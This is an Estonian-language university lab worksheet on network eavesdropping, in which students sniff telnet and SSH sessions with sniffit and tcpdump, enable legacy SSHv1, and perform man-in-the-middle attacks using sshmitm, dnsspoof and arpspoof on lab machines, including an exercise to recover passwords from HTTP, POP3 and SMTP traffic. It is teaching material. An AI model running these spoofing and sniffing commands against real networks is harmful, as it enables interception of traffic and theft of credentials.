Võrguliikluse pealtkuulamine

 1. Tehke sellele juhendile Reload!
 2. Ettevalmistuseks (rooduna; ssh võtme parool jätke tühjaks!):
  apt-get install telnetd sniffit tcpdump wireshark dsniff
  
  Kontrollige, kas teil on olemas fail /etc/ssh/ssh_host_key ning kui ei ole, laske uus SSHv1 võti genereerida:
  ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_key
  
  Kontrollige, et failis /etc/ssh/sshd_config oleks read
  Protocol 2,1
  HostKey /etc/ssh/ssh_host_key
  
  ning kui ei ole, redigeerige seda faili ning muutke Protocol-rida sobivaks ja lisage HostKey rida ning kui muutsite, siis andke ka käsk
  /etc/init.d/ssh restart
  
  Sellega konfigureerite SSH serveri ka protokolli versiooni 1 toetama (sest meie pealtkuulamisprogramm oskab ainult SSH v1 kuulata).
 3. Tekitage (rooduna) useradd abil oma masinasse kasutaja "test" ja pange talle passwd test abil parooliks testXX (kus XX on teie arvuti number)
 4. Tehke kindlaks oma arvuti IP-aadress:
  ip addr ls
  
  Teie IP-aadress on väljundis inet real enne /24 maski, 192.168.10.*
 5. Tekitage (rooduna) kataloog 'sniffit', ja pange seal sees käima 'sniffit':
  mkdir sniffit
  cd sniffit
  sniffit -s meiemasinaIP
  
  (või siseneva suuna logimiseks:)
  sniffit -t meiemasinaIP
  
 6. Võtke teine terminal, telnettige naabermasinasse, testimaks telneti töötamist ja logige sisse kasutajana test:
  telnet 192.168.10.Y
  
  Andke mõned käsud, et need ära tunneksite, ja logige välja (exit).
 7. Edasi krüptige liiklust: logige naabermasinasse ssh abil:
  ssh test@192.168.10.Y
  
  Andke samuti mõned käsud ja logige välja.
 8. Pange sniffit kinni (Ctrl+C) ja uurige logifaile (less abil) - kas leiate enda sisestatud teksti? Uuritud logifailid võib rahulikult ära kustutada (rm ...).
 9. Kontrollige, et saate ssh -1 test@192.168.10.Y abil naaberavutisse sisse logida.
 10. Moodustage 3-arvutised grupid: A - ohver, B - õige server, E - man-in-the middle.
 11. E - paneb ssh serveri seisma (/etc/init.d/ssh stop) käivitab
  sshmitm -I B-IP-aadress
  
 12. B - jälgib finger abil sisselogitud kasutajaid (mis masinast!)
 13. A - tekitab faili hosts.dnsspoof sisuga (E on vastava masina IP viimane number ja praksXX on masina B nimi)
  192.168.10.E praksXX.test.mt.ut.ee
  
  käivitab dnsspoofi:
  /usr/sbin/dnsspoof -f hosts.dnsspoof udp port 53
  
  Seejärel proovib teises aknas logida ssh'ga masinasse B (tõenäoliselt kaevatakse hosti võtme muutumise üle, lugege veateadet ning kustutage vajadusel fail .ssh/knwn_hosts, et teatest vabaneda)
  ssh -1 test@praksXX.test.mt.ut.ee
  
 14. E - jälgib liiklust ja soovikorral sekkub.
 15. Vahetage rolle (ssh uuesti käima, dnspoof seisma jne).
 16. Lülitage sisse IP pakettide ruutimine ja välja rp_filter ning ICMP redirectide saatmine:
  echo "1" > /proc/sys/net/ipv4/ip_forward
  echo "0" > /proc/sys/net/ipv4/conf/eth0/rp_filter
  echo "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects
  
 17. Moodustage paarid: pealtkuulaja A ja ohver B - pealtkuulaja käivitab:
  arpspoof 192.168.10.B
  
  ja samaaegselt veel lisaks
  tcpdump -e host 192.168.10.B
  
  Tüüpiline ARP tabel (näeb käsuga 'arp -a')
  praks07.test.mt.ut.ee (192.168.10.107) at 00:AA:BB:CC:DD:07 [ether] on eth0
  praks08.test.mt.ut.ee (192.168.10.108) at 00:AA:BB:CC:DD:08 [ether] on eth0
  praks09.test.mt.ut.ee (192.168.10.109) at 00:AA:BB:CC:DD:09 [ether] on eth0
  
 18. Kaks ohvrit telnetivad omavahel (B1 <-> B2) - pealtkuulaja A1 peaks nägema nüüd oma ohvri B1 arvutisse suunduvaid pakette (kui ei näe, uuri selle ohvri paarilise arvuti arp tabelit), samuti näeb A2 ohvri B2 liiklust.
 19. Proovige sniffit abil liiklust salvestada ja seda uurida.
  sniffit -t 192.168.10.Y
  
 20. Vahetage pooli.
 21. Kuulake sniffit -s ... abil enda arvutist tehtavaid veebipäringuid.
 22. Praktikumi arvestuse saamiseks saatke aadressil mroos@ut.ee üks võrgust kuulatud HTTP päring koos kõigi päiseridadega (mitte vastus).
 23. (*) Salvestage sniffiti abil veel erinevat sorti liiklust: HTTP (parooli all olev leht), HTTPS, POP3, SMTP (autentimisega) ning püüdke kindlaks teha parooli.
 24. Kustutage rooduna sniffit kataloog ja tekitatud failid:
  rm -rf /root/sniffit /root/hosts.dnsspoof